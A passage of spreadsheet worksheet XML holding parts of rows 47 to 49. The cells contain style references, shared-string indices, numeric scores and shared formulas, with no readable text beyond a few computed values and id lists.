      <c r="JU47" s="127"/>
      <c r="JV47" s="127"/>
      <c r="JW47" s="127"/>
      <c r="JX47" s="127"/>
      <c r="JY47" s="127"/>
      <c r="JZ47" s="127"/>
      <c r="KA47" s="127"/>
      <c r="KB47" s="127"/>
      <c r="KC47" s="127"/>
      <c r="KD47" s="127"/>
      <c r="KE47" s="127"/>
      <c r="KF47" s="127"/>
      <c r="KG47" s="127"/>
      <c r="KH47" s="127"/>
      <c r="KI47" s="127"/>
      <c r="KJ47" s="127"/>
      <c r="KK47" s="127"/>
      <c r="KL47" s="127"/>
      <c r="KM47" s="127"/>
      <c r="KN47" s="127"/>
      <c r="KO47" s="127"/>
      <c r="KP47" s="127"/>
      <c r="KQ47" s="127"/>
      <c r="KR47" s="127"/>
      <c r="KS47" s="127"/>
      <c r="KT47" s="127"/>
      <c r="KU47" s="127"/>
      <c r="KV47" s="127"/>
      <c r="KW47" s="127"/>
      <c r="KX47" s="127"/>
      <c r="KY47" s="127"/>
      <c r="KZ47" s="127"/>
      <c r="LA47" s="127"/>
      <c r="LB47" s="127"/>
      <c r="LC47" s="127"/>
      <c r="LD47" s="127"/>
      <c r="LE47" s="127"/>
      <c r="LF47" s="127"/>
      <c r="LG47" s="127"/>
      <c r="LH47" s="127"/>
      <c r="LI47" s="127"/>
      <c r="LJ47" s="127"/>
      <c r="LK47" s="127"/>
      <c r="LL47" s="127"/>
      <c r="LM47" s="127"/>
      <c r="LN47" s="127"/>
      <c r="LO47" s="127"/>
      <c r="LP47" s="127"/>
      <c r="LQ47" s="127"/>
      <c r="LR47" s="127"/>
      <c r="LS47" s="127"/>
      <c r="LT47" s="127"/>
      <c r="LU47" s="127"/>
      <c r="LV47" s="127"/>
      <c r="LW47" s="127"/>
      <c r="LX47" s="127"/>
      <c r="LY47" s="127"/>
      <c r="LZ47" s="127"/>
      <c r="MA47" s="127"/>
      <c r="MB47" s="127"/>
      <c r="MC47" s="127"/>
      <c r="MD47" s="127"/>
      <c r="ME47" s="127"/>
      <c r="MF47" s="127"/>
      <c r="MG47" s="127"/>
      <c r="MH47" s="127"/>
      <c r="MI47" s="127"/>
      <c r="MJ47" s="127"/>
      <c r="MK47" s="127"/>
      <c r="ML47" s="127"/>
      <c r="MM47" s="127"/>
      <c r="MN47" s="127"/>
      <c r="MO47" s="127"/>
      <c r="MP47" s="127"/>
      <c r="MQ47" s="127"/>
      <c r="MR47" s="127"/>
      <c r="MS47" s="127"/>
      <c r="MT47" s="127"/>
      <c r="MU47" s="127"/>
      <c r="MV47" s="127"/>
      <c r="MW47" s="127"/>
      <c r="MX47" s="127"/>
      <c r="MY47" s="127"/>
      <c r="MZ47" s="127"/>
      <c r="NA47" s="127"/>
      <c r="NB47" s="127"/>
      <c r="NC47" s="127"/>
      <c r="ND47" s="127"/>
      <c r="NE47" s="127"/>
      <c r="NF47" s="127"/>
      <c r="NG47" s="127"/>
      <c r="NH47" s="127"/>
      <c r="NI47" s="127"/>
      <c r="NJ47" s="127"/>
      <c r="NK47" s="127"/>
      <c r="NL47" s="127"/>
      <c r="NM47" s="127"/>
      <c r="NN47" s="127"/>
      <c r="NO47" s="127"/>
      <c r="NP47" s="127"/>
      <c r="NQ47" s="127"/>
      <c r="NR47" s="127"/>
      <c r="NS47" s="127"/>
      <c r="NT47" s="127"/>
      <c r="NU47" s="127"/>
      <c r="NV47" s="127"/>
      <c r="NW47" s="127"/>
      <c r="NX47" s="127"/>
      <c r="NY47" s="127"/>
    </row>
    <row r="48" ht="153.75" customHeight="1">
      <c r="B48" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C48" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D48" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E48" s="90" t="s">
        <v>989</v>
      </c>
      <c r="F48" s="90" t="s">
        <v>990</v>
      </c>
      <c r="G48" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H48" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I48" s="92" t="s">
        <v>991</v>
      </c>
      <c r="J48" s="92" t="s">
        <v>992</v>
      </c>
      <c r="K48" s="92" t="s">
        <v>1007</v>
      </c>
      <c r="L48" s="93" t="s">
        <v>267</v>
      </c>
      <c r="M48" s="93">
        <v>3.0</v>
      </c>
      <c r="N48" s="93">
        <v>1.0</v>
      </c>
      <c r="O48" s="93">
        <v>0.0</v>
      </c>
      <c r="P48" s="93">
        <v>1.0</v>
      </c>
      <c r="Q48" s="93">
        <f t="shared" si="94"/>
        <v>3</v>
      </c>
      <c r="R48" s="93">
        <v>3.0</v>
      </c>
      <c r="S48" s="93">
        <v>0.0</v>
      </c>
      <c r="T48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U48" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V48" s="96" t="s">
        <v>994</v>
      </c>
      <c r="W48" s="96" t="s">
        <v>995</v>
      </c>
      <c r="X48" s="126" t="s">
        <v>996</v>
      </c>
      <c r="Y48" s="126" t="s">
        <v>997</v>
      </c>
      <c r="Z48" s="132" t="s">
        <v>998</v>
      </c>
      <c r="AA48" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB48" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC48" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD48" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE48" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF48" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG48" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH48" s="99" t="s">
        <v>999</v>
      </c>
      <c r="AI48" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ48" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL48" s="100">
        <v>0.0</v>
      </c>
      <c r="AM48" s="100">
        <v>0.0</v>
      </c>
      <c r="AN48" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP48" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ48" s="100">
        <v>0.0</v>
      </c>
      <c r="AR48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT48" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX48" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY48" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ48" s="100">
        <v>0.0</v>
      </c>
      <c r="BA48" s="102">
        <v>3.0</v>
      </c>
      <c r="BB48" s="102">
        <v>0.0</v>
      </c>
      <c r="BC48" s="102">
        <v>0.0</v>
      </c>
      <c r="BD48" s="102">
        <v>0.0</v>
      </c>
      <c r="BE48" s="102">
        <v>0.0</v>
      </c>
      <c r="BF48" s="102">
        <v>0.0</v>
      </c>
      <c r="BG48" s="102">
        <v>0.0</v>
      </c>
      <c r="BH48" s="102">
        <v>0.0</v>
      </c>
      <c r="BI48" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ48" s="102">
        <v>0.0</v>
      </c>
      <c r="BK48" s="102">
        <v>0.0</v>
      </c>
      <c r="BL48" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM48" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN48" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO48" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP48" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ48" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR48" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS48" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT48" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU48" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV48" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW48" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX48" s="104">
        <v>0.0</v>
      </c>
      <c r="BY48" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ48" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA48" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CB48" s="104">
        <v>0.0</v>
      </c>
      <c r="CC48" s="104">
        <v>0.0</v>
      </c>
      <c r="CD48" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CE48" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CF48" s="104" t="str">
        <f t="shared" si="90"/>
        <v>-</v>
      </c>
      <c r="CG48" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CH48" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CI48" s="128" t="s">
        <v>12</v>
      </c>
      <c r="CJ48" s="128" t="s">
        <v>12</v>
      </c>
      <c r="CK48" s="104">
        <v>0.0</v>
      </c>
      <c r="CL48" s="104">
        <v>0.0</v>
      </c>
      <c r="CM48" s="105">
        <v>3.0</v>
      </c>
      <c r="CN48" s="105">
        <v>0.0</v>
      </c>
      <c r="CO48" s="105">
        <v>0.0</v>
      </c>
      <c r="CP48" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ48" s="105">
        <v>0.0</v>
      </c>
      <c r="CR48" s="105">
        <v>0.0</v>
      </c>
      <c r="CS48" s="105">
        <v>0.0</v>
      </c>
      <c r="CT48" s="105">
        <v>0.0</v>
      </c>
      <c r="CU48" s="105">
        <v>0.0</v>
      </c>
      <c r="CV48" s="105">
        <v>0.0</v>
      </c>
      <c r="CW48" s="105">
        <v>0.0</v>
      </c>
      <c r="CX48" s="105">
        <v>0.0</v>
      </c>
      <c r="CY48" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ48" s="105">
        <v>0.0</v>
      </c>
      <c r="DA48" s="105">
        <v>0.0</v>
      </c>
      <c r="DB48" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC48" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD48" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE48" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF48" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG48" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH48" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI48" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ48" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK48" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL48" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM48" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DN48" s="108">
        <v>3.0</v>
      </c>
      <c r="DO48" s="108">
        <v>3.0</v>
      </c>
      <c r="DP48" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ48" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DR48" s="108">
        <v>3.0</v>
      </c>
      <c r="DS48" s="108">
        <v>3.0</v>
      </c>
      <c r="DT48" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DU48" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV48" s="108" t="str">
        <f t="shared" si="91"/>
        <v>44486, 44484, 44488</v>
      </c>
      <c r="DW48" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX48" s="108" t="s">
        <v>1000</v>
      </c>
      <c r="DY48" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ48" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA48" s="108">
        <v>0.0</v>
      </c>
      <c r="EB48" s="108">
        <v>0.0</v>
      </c>
      <c r="EC48" s="109">
        <v>3.0</v>
      </c>
      <c r="ED48" s="109">
        <v>1.0</v>
      </c>
      <c r="EE48" s="109">
        <v>1.0</v>
      </c>
      <c r="EF48" s="109">
        <v>3.0</v>
      </c>
      <c r="EG48" s="109">
        <v>0.0</v>
      </c>
      <c r="EH48" s="109">
        <v>3.0</v>
      </c>
      <c r="EI48" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ48" s="109">
        <v>0.0</v>
      </c>
      <c r="EK48" s="109">
        <v>0.0</v>
      </c>
      <c r="EL48" s="109">
        <v>0.0</v>
      </c>
      <c r="EM48" s="109">
        <v>1.0</v>
      </c>
      <c r="EN48" s="109">
        <v>1.0</v>
      </c>
      <c r="EO48" s="109">
        <v>3.0</v>
      </c>
      <c r="EP48" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ48" s="109">
        <v>3.0</v>
      </c>
      <c r="ER48" s="110">
        <f t="shared" si="27"/>
        <v>1</v>
      </c>
      <c r="ES48" s="110">
        <f t="shared" si="28"/>
        <v>1</v>
      </c>
      <c r="ET48" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU48" s="110">
        <f t="shared" si="30"/>
        <v>1</v>
      </c>
      <c r="EV48" s="110">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="EW48" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX48" s="110">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="EY48" s="110">
        <f t="shared" si="34"/>
        <v>1</v>
      </c>
      <c r="EZ48" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA48" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB48" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC48" s="111" t="s">
        <v>1008</v>
      </c>
      <c r="FD48" s="111">
        <v>5.0</v>
      </c>
      <c r="FE48" s="111">
        <v>5.0</v>
      </c>
      <c r="FF48" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG48" s="111" t="s">
        <v>1000</v>
      </c>
      <c r="FH48" s="111">
        <v>3.0</v>
      </c>
      <c r="FI48" s="111">
        <v>3.0</v>
      </c>
      <c r="FJ48" s="111" t="s">
        <v>1009</v>
      </c>
      <c r="FK48" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL48" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 44486, 44484, 44488</v>
      </c>
      <c r="FM48" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN48" s="111" t="s">
        <v>1010</v>
      </c>
      <c r="FO48" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP48" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ48" s="111">
        <v>0.0</v>
      </c>
      <c r="FR48" s="111">
        <v>0.0</v>
      </c>
      <c r="FS48" s="112">
        <v>3.0</v>
      </c>
      <c r="FT48" s="112">
        <v>1.0</v>
      </c>
      <c r="FU48" s="112">
        <v>2.0</v>
      </c>
      <c r="FV48" s="112">
        <v>3.0</v>
      </c>
      <c r="FW48" s="112">
        <v>2.0</v>
      </c>
      <c r="FX48" s="112">
        <v>5.0</v>
      </c>
      <c r="FY48" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ48" s="112">
        <v>0.0</v>
      </c>
      <c r="GA48" s="112">
        <v>0.0</v>
      </c>
      <c r="GB48" s="112">
        <v>0.0</v>
      </c>
      <c r="GC48" s="112">
        <v>1.0</v>
      </c>
      <c r="GD48" s="112">
        <v>1.0</v>
      </c>
      <c r="GE48" s="112">
        <v>3.0</v>
      </c>
      <c r="GF48" s="112">
        <v>0.0</v>
      </c>
      <c r="GG48" s="112">
        <v>3.0</v>
      </c>
      <c r="GH48" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI48" s="113">
        <f t="shared" si="40"/>
        <v>1</v>
      </c>
      <c r="GJ48" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK48" s="113">
        <f t="shared" si="42"/>
        <v>2</v>
      </c>
      <c r="GL48" s="113">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="GM48" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN48" s="113">
        <f t="shared" si="45"/>
        <v>1.666666667</v>
      </c>
      <c r="GO48" s="113">
        <f t="shared" si="46"/>
        <v>1</v>
      </c>
      <c r="GP48" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ48" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR48" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS48" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT48" s="94" t="s">
        <v>1011</v>
      </c>
      <c r="GU48" s="116">
        <v>12090.0</v>
      </c>
      <c r="GV48" s="116">
        <v>1.0</v>
      </c>
      <c r="GW48" s="116">
        <v>2.0</v>
      </c>
      <c r="GX48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD48" s="131">
        <v>12090.0</v>
      </c>
      <c r="HE48" s="131">
        <v>12090.0</v>
      </c>
      <c r="HF48" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG48" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH48" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI48" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ48" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK48" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL48" s="93">
        <v>3.0</v>
      </c>
      <c r="HM48" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN48" s="93">
        <v>1.0</v>
      </c>
      <c r="HO48" s="93">
        <v>0.0</v>
      </c>
      <c r="HP48" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ48" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR48" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS48" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT48" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU48" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV48" s="119" t="s">
        <v>1005</v>
      </c>
      <c r="HW48" s="119">
        <v>2.0</v>
      </c>
      <c r="HX48" s="119">
        <v>6.0</v>
      </c>
      <c r="HY48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC48" s="120" t="str">
        <f t="shared" si="96"/>
        <v>92322, 31696</v>
      </c>
      <c r="ID48" s="120">
        <v>31696.0</v>
      </c>
      <c r="IE48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF48" s="120">
        <v>92322.0</v>
      </c>
      <c r="IG48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH48" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II48" s="99" t="s">
        <v>1006</v>
      </c>
      <c r="IJ48" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK48" s="99">
        <v>3.0</v>
      </c>
      <c r="IL48" s="99">
        <v>1.0</v>
      </c>
      <c r="IM48" s="121">
        <f t="shared" si="93"/>
        <v>1</v>
      </c>
      <c r="IN48" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO48" s="98">
        <v>1.0</v>
      </c>
      <c r="IP48" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ48" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR48" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS48" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT48" s="127"/>
      <c r="IU48" s="127"/>
      <c r="IV48" s="127"/>
      <c r="IW48" s="127"/>
      <c r="IX48" s="127"/>
      <c r="IY48" s="127"/>
      <c r="IZ48" s="127"/>
      <c r="JA48" s="127"/>
      <c r="JB48" s="127"/>
      <c r="JC48" s="127"/>
      <c r="JD48" s="127"/>
      <c r="JE48" s="127"/>
      <c r="JF48" s="127"/>
      <c r="JG48" s="127"/>
      <c r="JH48" s="127"/>
      <c r="JI48" s="127"/>
      <c r="JJ48" s="127"/>
      <c r="JK48" s="127"/>
      <c r="JL48" s="127"/>
      <c r="JM48" s="127"/>
      <c r="JN48" s="127"/>
      <c r="JO48" s="127"/>
      <c r="JP48" s="127"/>
      <c r="JQ48" s="127"/>
      <c r="JR48" s="127"/>
      <c r="JS48" s="127"/>
      <c r="JT48" s="127"/>
      <c r="JU48" s="127"/>
      <c r="JV48" s="127"/>
      <c r="JW48" s="127"/>
      <c r="JX48" s="127"/>
      <c r="JY48" s="127"/>
      <c r="JZ48" s="127"/>
      <c r="KA48" s="127"/>
      <c r="KB48" s="127"/>
      <c r="KC48" s="127"/>
      <c r="KD48" s="127"/>
      <c r="KE48" s="127"/>
      <c r="KF48" s="127"/>
      <c r="KG48" s="127"/>
      <c r="KH48" s="127"/>
      <c r="KI48" s="127"/>
      <c r="KJ48" s="127"/>
      <c r="KK48" s="127"/>
      <c r="KL48" s="127"/>
      <c r="KM48" s="127"/>
      <c r="KN48" s="127"/>
      <c r="KO48" s="127"/>
      <c r="KP48" s="127"/>
      <c r="KQ48" s="127"/>
      <c r="KR48" s="127"/>
      <c r="KS48" s="127"/>
      <c r="KT48" s="127"/>
      <c r="KU48" s="127"/>
      <c r="KV48" s="127"/>
      <c r="KW48" s="127"/>
      <c r="KX48" s="127"/>
      <c r="KY48" s="127"/>
      <c r="KZ48" s="127"/>
      <c r="LA48" s="127"/>
      <c r="LB48" s="127"/>
      <c r="LC48" s="127"/>
      <c r="LD48" s="127"/>
      <c r="LE48" s="127"/>
      <c r="LF48" s="127"/>
      <c r="LG48" s="127"/>
      <c r="LH48" s="127"/>
      <c r="LI48" s="127"/>
      <c r="LJ48" s="127"/>
      <c r="LK48" s="127"/>
      <c r="LL48" s="127"/>
      <c r="LM48" s="127"/>
      <c r="LN48" s="127"/>
      <c r="LO48" s="127"/>
      <c r="LP48" s="127"/>
      <c r="LQ48" s="127"/>
      <c r="LR48" s="127"/>
      <c r="LS48" s="127"/>
      <c r="LT48" s="127"/>
      <c r="LU48" s="127"/>
      <c r="LV48" s="127"/>
      <c r="LW48" s="127"/>
      <c r="LX48" s="127"/>
      <c r="LY48" s="127"/>
      <c r="LZ48" s="127"/>
      <c r="MA48" s="127"/>
      <c r="MB48" s="127"/>
      <c r="MC48" s="127"/>
      <c r="MD48" s="127"/>
      <c r="ME48" s="127"/>
      <c r="MF48" s="127"/>
      <c r="MG48" s="127"/>
      <c r="MH48" s="127"/>
      <c r="MI48" s="127"/>
      <c r="MJ48" s="127"/>
      <c r="MK48" s="127"/>
      <c r="ML48" s="127"/>
      <c r="MM48" s="127"/>
      <c r="MN48" s="127"/>
      <c r="MO48" s="127"/>
      <c r="MP48" s="127"/>
      <c r="MQ48" s="127"/>
      <c r="MR48" s="127"/>
      <c r="MS48" s="127"/>
      <c r="MT48" s="127"/>
      <c r="MU48" s="127"/>
      <c r="MV48" s="127"/>
      <c r="MW48" s="127"/>
      <c r="MX48" s="127"/>
      <c r="MY48" s="127"/>
      <c r="MZ48" s="127"/>
      <c r="NA48" s="127"/>
      <c r="NB48" s="127"/>
      <c r="NC48" s="127"/>
      <c r="ND48" s="127"/>
      <c r="NE48" s="127"/>
      <c r="NF48" s="127"/>
      <c r="NG48" s="127"/>
      <c r="NH48" s="127"/>
      <c r="NI48" s="127"/>
      <c r="NJ48" s="127"/>
      <c r="NK48" s="127"/>
      <c r="NL48" s="127"/>
      <c r="NM48" s="127"/>
      <c r="NN48" s="127"/>
      <c r="NO48" s="127"/>
      <c r="NP48" s="127"/>
      <c r="NQ48" s="127"/>
      <c r="NR48" s="127"/>
      <c r="NS48" s="127"/>
      <c r="NT48" s="127"/>
      <c r="NU48" s="127"/>
      <c r="NV48" s="127"/>
      <c r="NW48" s="127"/>
      <c r="NX48" s="127"/>
      <c r="NY48" s="127"/>
    </row>
    <row r="49" ht="153.75" customHeight="1">
      <c r="B49" s="89" t="s">
        <v>951</v>
      </c>
      <c r="C49" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D49" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E49" s="90" t="s">
        <v>1012</v>
      </c>
      <c r="F49" s="90" t="s">
        <v>1013</v>
      </c>
      <c r="G49" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H49" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I49" s="92" t="s">
        <v>1014</v>
      </c>
      <c r="J49" s="92" t="s">
        <v>1015</v>
      </c>
      <c r="K49" s="92" t="s">
        <v>1016</v>
      </c>
      <c r="L49" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M49" s="93">
        <v>4.0</v>
      </c>
      <c r="N49" s="93">
        <v>3.0</v>
      </c>
      <c r="O49" s="93">
        <v>0.0</v>
      </c>
      <c r="P49" s="93">
        <v>3.0</v>
      </c>
      <c r="Q49" s="93">
        <f t="shared" si="94"/>
        <v>3</v>
      </c>
      <c r="R49" s="93">
        <v>3.0</v>
      </c>
      <c r="S49" s="93">
        <v>0.0</v>
      </c>
      <c r="T49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U49" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V49" s="126" t="s">
        <v>1017</v>
      </c>
      <c r="W49" s="96" t="s">
        <v>1018</v>
      </c>
      <c r="X49" s="97" t="s">
        <v>1019</v>
      </c>
      <c r="Y49" s="96" t="s">
        <v>1020</v>
      </c>
      <c r="Z49" s="96" t="s">
        <v>1021</v>
      </c>
      <c r="AA49" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB49" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC49" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD49" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE49" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF49" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG49" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH49" s="99" t="s">
        <v>1022</v>
      </c>
      <c r="AI49" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ49" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK49" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL49" s="100">
        <v>1.0</v>
      </c>
      <c r="AM49" s="100">
        <v>4.0</v>
      </c>
      <c r="AN49" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO49" s="100">
        <v>1917.0</v>
      </c>
      <c r="AP49" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ49" s="100">
        <v>4.0</v>
      </c>
      <c r="AR49" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS49" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT49" s="100">
        <f t="shared" si="89"/>
        <v>1917</v>
      </c>
      <c r="AU49" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV49" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW49" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX49" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY49" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ49" s="100">
        <v>0.0</v>
      </c>
      <c r="BA49" s="102">
        <v>4.0</v>
      </c>
      <c r="BB49" s="102">
        <v>1.0</v>
      </c>
      <c r="BC49" s="102">
        <v>4.0</v>
      </c>
      <c r="BD49" s="102">
        <v>4.0</v>
      </c>
      <c r="BE49" s="102">
        <v>0.0</v>
      </c>
      <c r="BF49" s="102">
        <v>0.0</v>
      </c>
      <c r="BG49" s="102">
        <v>0.0</v>
      </c>
      <c r="BH49" s="102">
        <v>0.0</v>
      </c>
      <c r="BI49" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ49" s="102">
        <v>4.0</v>
      </c>
      <c r="BK49" s="102">
        <v>4.0</v>
      </c>
      <c r="BL49" s="103">
        <f t="shared" si="3"/>
        <v>0.3333333333</v>
      </c>
      <c r="BM49" s="103">
        <f t="shared" si="4"/>
        <v>0.3333333333</v>
      </c>
      <c r="BN49" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO49" s="103">
        <f t="shared" si="6"/>
        <v>1.333333333</v>
      </c>
      <c r="BP49" s="103">
        <f t="shared" si="7"/>
        <v>1.333333333</v>
      </c>
      <c r="BQ49" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR49" s="103">
        <f t="shared" si="9"/>
        <v>1.333333333</v>
      </c>
      <c r="BS49" s="103">
        <f t="shared" si="10"/>
        <v>1.333333333</v>
      </c>
      <c r="BT49" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
